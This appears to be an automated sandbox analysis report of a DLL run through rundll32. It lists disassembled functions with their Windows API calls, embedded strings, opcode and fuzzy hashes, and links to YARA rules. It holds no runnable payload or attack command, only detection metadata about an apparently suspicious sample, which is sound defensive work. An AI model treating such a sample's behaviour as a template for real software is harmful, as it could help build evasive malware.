Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID: K;(Io
API String ID: 3033488037-79920696
Opcode ID: 2ef3bf1b3ed9d7c4afe2231008384fac62eed0a486e6ef3f6cf27d55acfae8d3
Instruction ID: 54160f872560c6440a267ff7bff2020ecabab16834e5469a9de88d65ac416a5c
Opcode Fuzzy Hash: 2ef3bf1b3ed9d7c4afe2231008384fac62eed0a486e6ef3f6cf27d55acfae8d3
Instruction Fuzzy Hash: 4B51B332A00705AFD754CFA9DD40AAA77F6FF44324B184979E819EB250E735DD81CB88

Uniqueness

Uniqueness Score: -1.00%

Function 6EA13460, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,49283B4B,?,?,00000000,6EA390E0,000000FF,?,6EA1083E,00000000), ref: 6EA134A4
PdhCloseQuery.PDH(?,49283B4B,?,?,00000000,6EA390E0,000000FF,?,6EA1083E,00000000), ref: 6EA134BA
PdhOpenQueryW.PDH(00000000,00000000,00000000), ref: 6EA134E4
PdhValidatePathW.PDH(?), ref: 6EA13547
PdhAddCounterW.PDH(00000000,?,00000000,?), ref: 6EA1356E

Strings

K;(Io, xrefs: 6EA1347B

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID: K;(Io
API String ID: 698537007-79920696
Opcode ID: e635f788bbea4fe9413b33e52d26f02d561694f18963b46067af51b58291908c
Instruction ID: 5649824b094911ca7f296f39a20af0930829afc76351d059175c36e96adb6538
Opcode Fuzzy Hash: e635f788bbea4fe9413b33e52d26f02d561694f18963b46067af51b58291908c
Instruction Fuzzy Hash: 9851AC71904659ABDB20CF94CD44BDAF3B8FF40310F0186A5E568EB650DB74AAC4CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA04B50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA04B86
std::_Lockit::_Lockit.LIBCPMT ref: 6EA04BA6
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA04BC6
std::_Facet_Register.LIBCPMT ref: 6EA04C61
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA04C79

Strings

K;(Io, xrefs: 6EA04B64

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: K;(Io
API String ID: 459529453-79920696
Opcode ID: dd89cb968dd030719f62b5573ccc66a91e3e05b2b3caaff5beb9810ccae35046
Instruction ID: 4e14690cb8bb300b67f09a4e9562c0b43a74f492bd5a530ca13143723ca19e79
Opcode Fuzzy Hash: dd89cb968dd030719f62b5573ccc66a91e3e05b2b3caaff5beb9810ccae35046
Instruction Fuzzy Hash: EE41DC71A08614CFCB51DFD8D480BAABBB5FB50B18F14855DD816AF381DB31AD86CB88

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2BE3B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

@Mt, xrefs: 6EA2BE9B, 6EA2BEE1
C:\Windows\SysWOW64\rundll32.exe, xrefs: 6EA2BE40

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @Mt$C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-3641996564
Opcode ID: 1379fd29b41855162281ccba1f0ebb9d2f8c51626ce4dc4d7723e37d6842a184
Instruction ID: 792bf874910bd95d20421c5c8b1cd50e165502c0de38207477aff63779083903
Opcode Fuzzy Hash: 1379fd29b41855162281ccba1f0ebb9d2f8c51626ce4dc4d7723e37d6842a184
Instruction Fuzzy Hash: 9E219571604216BFDB109FE68D8089B77ADEF4136871D8A34F618B7558DB30EDC18768

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07BD0, Relevance: 10.6, APIs: 7, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6EA07BEE
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6EA07BFC
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6EA07C11
SysFreeString.OLEAUT32(00000000), ref: 6EA07C1C
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6EA07C3B
SysFreeString.OLEAUT32(00000000), ref: 6EA07C48
SysFreeString.OLEAUT32 ref: 6EA07C72

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: 3a246887d7700dfa28b214a83c19a5d4f7bc29aa5dcb7e762310b18085c219ed
Instruction ID: c5325b3d7b48b85c7919ba156cbc6ca2db9e82ca626655d3cf5ffee3c9a5d4b8
Opcode Fuzzy Hash: 3a246887d7700dfa28b214a83c19a5d4f7bc29aa5dcb7e762310b18085c219ed
Instruction Fuzzy Hash: 8A114831640726FFDE6026949C0DF9A7F69DB07B25F204205FA14FE1C0CAB29D85C5A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA33CFE, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6EA33A48: _free.LIBCMT ref: 6EA33A6D

_free.LIBCMT ref: 6EA33D4C

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA33D57
_free.LIBCMT ref: 6EA33D62
_free.LIBCMT ref: 6EA33DB6
_free.LIBCMT ref: 6EA33DC1
_free.LIBCMT ref: 6EA33DCC
_free.LIBCMT ref: 6EA33DD7

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 626a4af83b5a11caf917ef27dbac739c1afc9d2b6aaeb70603d007920aac55e6
Instruction ID: 7309bd2e87f377bf1f1e86cf4f3d57c2ef6311177cb8dc0c117f8782345d6e69
Opcode Fuzzy Hash: 626a4af83b5a11caf917ef27dbac739c1afc9d2b6aaeb70603d007920aac55e6
Instruction Fuzzy Hash: 0E118171984B14BAD620ABF0DD0AFCB779CAF40B05F444C38B2F9A6190DB3BB9895754

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1AB77, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EA1AC38,00000000,?,00000001,00000000,?,6EA1ACAF,00000001,FlsFree,6EA3BE2C,FlsFree,00000000), ref: 6EA1AC07

Strings

api-ms-, xrefs: 6EA1ABC7
@Mt, xrefs: 6EA1ABB7

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: @Mt$api-ms-
API String ID: 3664257935-3606155711
Opcode ID: 6eed250f0aa91cbe1c9073b83d243511d18b91683709f3297e6ce6a4512e0107
Instruction ID: 2ec409375c4025f344d640d2bd8de7807bdf85d526c209672dbf08b356df55b6
Opcode Fuzzy Hash: 6eed250f0aa91cbe1c9073b83d243511d18b91683709f3297e6ce6a4512e0107
Instruction Fuzzy Hash: BC11A735A4DA71ABDF624AA88C40B8D37A79F027B0F294110E914FF284D770ED8986D9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA175F0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6EA175FC
GetLastError.KERNEL32(8007000E,?,?,?,00000000), ref: 6EA17601
_com_issue_error.COMSUPP ref: 6EA17614
GetLastError.KERNEL32(?,?,?,00000000), ref: 6EA17622
_com_issue_error.COMSUPP ref: 6EA17635

Strings

@Mt, xrefs: 6EA17601, 6EA17622

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ErrorLast
String ID: @Mt
API String ID: 1321852664-1491384996
Opcode ID: ac7abe776e1d684bcf3bea366ece25cb804dcf316db8a9cf0825f49a746f0783
Instruction ID: e71cd8855dc815e2e11600608e9e7fe95b64f0108d7c0fe1d517a953a567393d
Opcode Fuzzy Hash: ac7abe776e1d684bcf3bea366ece25cb804dcf316db8a9cf0825f49a746f0783
Instruction Fuzzy Hash: C2E0C2B440C26296CA1067F18E087FA314C5F03179F245E54706CE80E0EF3CC1C696BD

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0DF40, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,00000000,00000000,?,C000008C,00000001), ref: 6EA0DF7E
CharNextW.USER32(00000000,?,00000000,00000000), ref: 6EA0DFAB
CharNextW.USER32(7691EEF0,?,00000000,00000000), ref: 6EA0DFC4
CharNextW.USER32(7691EEF0,?,00000000,00000000), ref: 6EA0DFCF
CharNextW.USER32(00000001,?,00000000,00000000), ref: 6EA0E03E

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 5b1051969ba183dc6312f412297b5e235eb2598d312d0c83babd0db62d23b999
Instruction ID: 8aab628767e6751dd0da772a36d5e91995617bf9830400c9b93cac899311304e
Opcode Fuzzy Hash: 5b1051969ba183dc6312f412297b5e235eb2598d312d0c83babd0db62d23b999
Instruction Fuzzy Hash: B041F736604216CFCF10DFA9E880269B7F2EF89314B55C46AD444CB354E7319E82DB95

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2B82F, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA2B9C9

Strings

K;(Io, xrefs: 6EA2BADE
*?, xrefs: 6EA2B872

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$K;(Io
API String ID: 269201875-224639561
Opcode ID: 8ae66dc61bb2168d8491c6587d8b0c185cba3f0793e3a00eca5a6c596119b6cb
Instruction ID: e9c1b0ac180b2f1780c4ea024b91273a5f5cf3e828295989cd053bee063bca75
Opcode Fuzzy Hash: 8ae66dc61bb2168d8491c6587d8b0c185cba3f0793e3a00eca5a6c596119b6cb
Instruction Fuzzy Hash: 99613875E042199FDB14CFA9C8805EDFBF9EF48310B28866AD814F7308D731AE818B94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05F40, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158threadCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05F6A
GetOEMCP.KERNEL32(00000000,?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05FD1
GetForegroundWindow.USER32(?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F), ref: 6EA06043
GetThreadLocale.KERNEL32(?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F), ref: 6EA06118

Strings

H, xrefs: 6EA0607A

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ForegroundLocaleThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: H
API String ID: 711472001-2852464175
Opcode ID: cc203cb137191a7b3d4a95f635864bd430ffdc335c225fc62dde348511fe6341
Instruction ID: 65b940eaefa3be152e41923aef6e8d45d7b2b1b3f6359c1b92e8aeb300da24c9
Opcode Fuzzy Hash: cc203cb137191a7b3d4a95f635864bd430ffdc335c225fc62dde348511fe6341
Instruction Fuzzy Hash: 2851F632D20B1CDACB029BBB944069DF3B66FDF244F18C755A904B7355EB3519C68A44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA022D0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 152COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6EA0244F

Part of subcall function 6EA1838E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,24448D6E,6EA152C0,?,6EA49E54,?,?,?,24448D6E), ref: 6EA183EE

Strings

ios_base::badbit set, xrefs: 6EA023E7, 6EA02412, 6EA02433
ios_base::failbit set, xrefs: 6EA022E5
t, xrefs: 6EA023B0
K;(Io, xrefs: 6EA022E7

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: K;(Io$ios_base::badbit set$ios_base::failbit set$t
API String ID: 3109751735-3129571370
Opcode ID: 517c7c1360ed3534b3f8339b9021589412f4710c77c1153d91effaf354fcf17b
Instruction ID: 7fc50e8dc22f80f39028172137efbdad537f32fe7a13f626a0cb643c6b21bf49
Opcode Fuzzy Hash: 517c7c1360ed3534b3f8339b9021589412f4710c77c1153d91effaf354fcf17b
Instruction Fuzzy Hash: B741F6B1504319AFDB04CF98D840BDEB7BCEF45324F14861AE514E7781D771A984CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2DBB5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA2DCCA

Part of subcall function 6EA2DAD4: __alloca_probe_16.LIBCMT ref: 6EA2DB27
Part of subcall function 6EA2DAD4: __freea.LIBCMT ref: 6EA2DB89

_free.LIBCMT ref: 6EA2DC20

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

GetLastError.KERNEL32(?,?,?,?,00000000), ref: 6EA2DC5B

Part of subcall function 6EA2B406: HeapAlloc.KERNEL32(00000008,?,00000000,?,6EA28B1E,00000001,00000364,FFFFFFFF,000000FF,?,6EA17EB3,?,?,24448D6E,00000000), ref: 6EA2B447

Strings

@Mt, xrefs: 6EA2DC5B
K;(Io, xrefs: 6EA2DBC0

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHeapLast_free$AllocFree__alloca_probe_16__freea
String ID: @Mt$K;(Io
API String ID: 3350685118-206996876
Opcode ID: ad600bbdfab473c4a9f811e4051ed30bc961776152b30b7a1c7e191a7dd3ada5
Instruction ID: f436574bef14611d6b06c03f43afaab7189c8989e043fb94b4e6b00d0138e044
Opcode Fuzzy Hash: ad600bbdfab473c4a9f811e4051ed30bc961776152b30b7a1c7e191a7dd3ada5
Instruction Fuzzy Hash: 4941A071904525AFDF218EA98D40F9A7BBDEF45310F0848A5F908F6141EB71CD80CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2B760, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6EA27C0A: _free.LIBCMT ref: 6EA27C18

Part of subcall function 6EA2C80B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,6EA2E018,?,00000000,00000000), ref: 6EA2C8AD

GetLastError.KERNEL32 ref: 6EA2B7C8
__dosmaperr.LIBCMT ref: 6EA2B7CF
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6EA2B80E
__dosmaperr.LIBCMT ref: 6EA2B815

Strings

@Mt, xrefs: 6EA2B7C8, 6EA2B80E

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID: @Mt
API String ID: 167067550-1491384996
Opcode ID: ab6e026e2f3c2f1a9407cc1597d1102d7ca96ddbfc7d4ebd51bccb25d0ba9b4f
Instruction ID: 8c473cfcd82c18fa6c6b5f156d22a1cabdfc0534d37669ad620441e528220306
Opcode Fuzzy Hash: ab6e026e2f3c2f1a9407cc1597d1102d7ca96ddbfc7d4ebd51bccb25d0ba9b4f
Instruction Fuzzy Hash: 6B21B871504615AFDB109FF6CD808A677ADEF0536871C8B34E429B7154E730DDC187A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA023B0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6EA0244F

Part of subcall function 6EA1838E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,24448D6E,6EA152C0,?,6EA49E54,?,?,?,24448D6E), ref: 6EA183EE

Strings

ios_base::badbit set, xrefs: 6EA023E7, 6EA02412, 6EA02433
ios_base::eofbit set, xrefs: 6EA023F6
ios_base::failbit set, xrefs: 6EA022E5, 6EA023F1
t, xrefs: 6EA023B0

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$t
API String ID: 3109751735-4201806346
Opcode ID: bc6cf4a6604351c9de53680cd487fb7ca87e3876fe885997daea5f5609e31b5e
Instruction ID: ed13e74eb30734bdada0821f880c430041a245d8f83c7e361d9475df7660b43b
Opcode Fuzzy Hash: bc6cf4a6604351c9de53680cd487fb7ca87e3876fe885997daea5f5609e31b5e
Instruction Fuzzy Hash: 1A11D5B2904715AFC700CED8E801BD6B3DCAF15214F58851AF964DB681F770E9D4CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2897C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28981
_free.LIBCMT ref: 6EA289DE
_free.LIBCMT ref: 6EA28A14
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28A1F

Strings

@Mt, xrefs: 6EA28981

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID: @Mt
API String ID: 2283115069-1491384996
Opcode ID: b3160e739de465bfd0be13acdffb77456896494bc0a11720a1254b79b63c77b1
Instruction ID: b44f26e4da50ec4f3c77395e4a35ee2c70f2af7aeff06125b133b6e5fc8d3fce
Opcode Fuzzy Hash: b3160e739de465bfd0be13acdffb77456896494bc0a11720a1254b79b63c77b1
Instruction Fuzzy Hash: 5711C672208A05AFEB5116F88D84A5B259DEFC237872D0A34F128BF1C4DF22CD86413D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07980, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6EA079AF
__aullrem.LIBCMT ref: 6EA079E0
FlushProcessWriteBuffers.KERNEL32(49283B4B,00000000,0000005F,00000000,?,05AF0528,00000000,00000002,74E00DE0), ref: 6EA07A0E

Strings

t, xrefs: 6EA07A14, 6EA079FB
K;(Io, xrefs: 6EA07986

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffersFlushProcessWrite__aulldiv__aullrem
String ID: K;(Io$t
API String ID: 3129485293-3881279588
Opcode ID: 41a384f7a4f6a93567a01db921aaf7983077409740594ce43f46020b3890a847
Instruction ID: 850235936caca7430c32b998437ed3d6b9253ffface7a33be87c1144456828e6
Opcode Fuzzy Hash: 41a384f7a4f6a93567a01db921aaf7983077409740594ce43f46020b3890a847
Instruction Fuzzy Hash: 99114C317002086FF708A9AD6D41BBB729EC7C8709F564939F90ACB3C0EA20DC4442A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA28AD3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6EA24AA1,6EA282CF,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?), ref: 6EA28AD8
_free.LIBCMT ref: 6EA28B35
_free.LIBCMT ref: 6EA28B6B
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA28B76

Strings

@Mt, xrefs: 6EA28AD8

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID: @Mt
API String ID: 2283115069-1491384996
Opcode ID: 8248a4dd2fc99861011e19789e1f505ccc58f74512161d9379acbde1270da50d
Instruction ID: 55cd91c964cbe54724fae24bbb47eee5652646ff5b2af0ae982799e34f026c2b
Opcode Fuzzy Hash: 8248a4dd2fc99861011e19789e1f505ccc58f74512161d9379acbde1270da50d
Instruction Fuzzy Hash: FE1186B2248B056FDB4115F94D84E5A255DEFC637872D4A38F128BE1D4DE23CD868138

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2BF02, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6EA2BF27
GetLastError.KERNEL32 ref: 6EA2BF31
__dosmaperr.LIBCMT ref: 6EA2BF38

Strings

@Mt, xrefs: 6EA2BF31
K;(Io, xrefs: 6EA2BF0D

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastModuleName__dosmaperr
String ID: @Mt$K;(Io
API String ID: 4076908705-206996876
Opcode ID: d2195c52ec8c56dbcaa400ac4c3c39c101fa70458cef0ebee6899f6552ad950c
Instruction ID: 27c86b7a6160b1ebb825db73a08a30625c2580f31cea23fda680fe7a38590d2a
Opcode Fuzzy Hash: d2195c52ec8c56dbcaa400ac4c3c39c101fa70458cef0ebee6899f6552ad950c
Instruction Fuzzy Hash: 1F110C7194421CAFDF60DFA8DC88BDA77B8EB58304F1445E9E50DE7240DB709A858F58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA10D20, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6EA10D4A
